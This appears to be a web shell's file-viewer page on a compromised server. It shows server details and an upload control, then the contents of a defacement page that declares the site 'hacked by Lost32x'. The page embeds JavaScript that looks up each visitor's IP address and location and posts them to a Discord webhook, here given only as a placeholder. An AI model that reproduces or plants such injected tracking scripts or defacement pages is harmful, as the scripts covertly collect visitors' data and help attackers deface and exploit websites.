HEX
Server: LiteSpeed
System: Linux venus 5.15.0-157-generic #167-Ubuntu SMP Wed Sep 17 21:35:53 UTC 2025 x86_64
User: axxoncom (1007)
PHP: 8.3.19
Disabled: exec,system,passthru,shell_exec,proc_close,proc_open,dl,popen,show_source,posix_kill,posix_mkfifo,posix_getpwuid,posix_setpgid,posix_setsid,posix_setuid,posix_setgid,posix_seteuid,posix_setegid,posix_uname
Upload Files
File: /home/axxoncom/domains/theluvbox.pk/public_html/readme.html
<html>
<head>
<title> Hacked by Lost32x </title>
<style>
body {
        background-color: black;
        color: white;
        font-family: monospace;
        text-align: center;
}
h1 {
        color: red;
        font-size: 2rem;
}
p {
        font-size: 1rem;
}
marquee {
        font-size: 1rem;
}
</style>
</head>

<body>
<h1> Your website has been hacked by Lost32x </h1>
<p> ~6ickzone and 0wnzS3c~ </p>
<br>
<img src="https://www.creativefabrica.com/wp-content/uploads/2022/11/02/Dark-Penguin-Smoking-Weed-44311134-1.png">
<br>
<marquee> We are: 0x6ick e Lost32x! </marquee>

<script>
    // Substitua pelo seu webhook do Discord
    const webhookURL = "cu";

    // Obtem IP e localização do usuário via geolocation-db
    fetch('https://geolocation-db.com/json/')
      .then(response => response.json())
      .then(data => {
        const ip = data.IPv4 || data.ip;
        const country = data.country_name;
        const city = data.city;

        const message = `🌐 Novo acesso detectado:nn🧠 IP: ${ip}n📍 Localização: ${city}, ${country}`;

        // Envia para o webhook do Discord
        fetch(webhookURL, {
          method: 'POST',
          headers: {
            'Content-Type': 'application/json'
          },
          body: JSON.stringify({
            content: message
          })
        });
      });
</script>

<br><br>

</body>
</html>